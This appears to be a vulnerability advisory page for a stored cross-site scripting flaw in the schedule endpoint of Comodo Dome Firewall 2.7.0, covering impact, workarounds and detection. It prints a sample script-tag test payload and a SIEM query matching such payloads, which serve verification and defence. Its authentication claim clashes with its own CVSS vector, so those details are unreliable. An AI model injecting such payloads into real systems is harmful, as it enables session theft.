Login Sign Up

CVE-2019-25419

7.2 HIGH
Cross-Site Scripting

📋 TL;DR

Comodo Dome Firewall 2.7.0 contains a stored cross-site scripting vulnerability in the schedule endpoint. Attackers can inject malicious JavaScript via the SCHNAME parameter in POST requests, which executes in administrators' browsers when viewing the schedule page. This affects administrators of Comodo Dome Firewall 2.7.0 installations.

💻 Affected Systems

Products:
  • Comodo Dome Firewall
Versions: 2.7.0
Operating Systems: All supported platforms
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability exists in the web management interface's schedule functionality.

📦 What is this software?

Dome Firewall by Comodo

View all CVEs affecting Dome Firewall →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator session cookies, hijack administrative sessions, install backdoors, or pivot to internal network systems.

🟠

Likely Case

Attackers steal administrator credentials or session tokens to gain unauthorized administrative access to the firewall.

🟢

If Mitigated

With proper input validation and output encoding, malicious scripts would be neutralized before execution.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploit requires authentication to access the schedule endpoint, but proof-of-concept code is publicly available.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: Not publicly available

Restart Required: No

Instructions:

1. Check Comodo vendor website for security updates. 2. Apply any available patches. 3. Verify the fix by testing the schedule endpoint.

🔧 Temporary Workarounds

Input Validation Filter

all

Implement server-side input validation to sanitize SCHNAME parameter values.

Not applicable - requires code modification

Content Security Policy

all

Implement strict Content Security Policy headers to prevent script execution.

Not applicable - requires web server configuration

🧯 If You Can't Patch

  • Restrict access to the firewall management interface to trusted IP addresses only.
  • Implement web application firewall rules to block XSS payloads in POST requests.

🔍 How to Verify

Check if Vulnerable:

Test by submitting a benign XSS payload (e.g., <script>alert('test')</script>) to the schedule endpoint's SCHNAME parameter and check if it executes when viewing the schedule page.

Check Version:

Check the firewall web interface for version information, typically under System > About or similar menu.

Verify Fix Applied:

Retest with the same XSS payload after applying fixes to confirm it no longer executes.

📡 Detection & Monitoring

Log Indicators:

  • Unusual POST requests to schedule endpoint with JavaScript payloads in parameters
  • Multiple failed authentication attempts followed by schedule endpoint access

Network Indicators:

  • HTTP POST requests containing script tags or JavaScript code in SCHNAME parameter

SIEM Query:

source="firewall_logs" AND (url_path="/schedule" OR parameter="SCHNAME") AND (content="<script>" OR content="javascript:")

📊 Metadata

CVE ID: CVE-2019-25419
CVSS v3 Score: 7.2 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
CWE: CWE-79
Published: February 19, 2026
Last Updated: February 20, 2026

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2019-25419, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)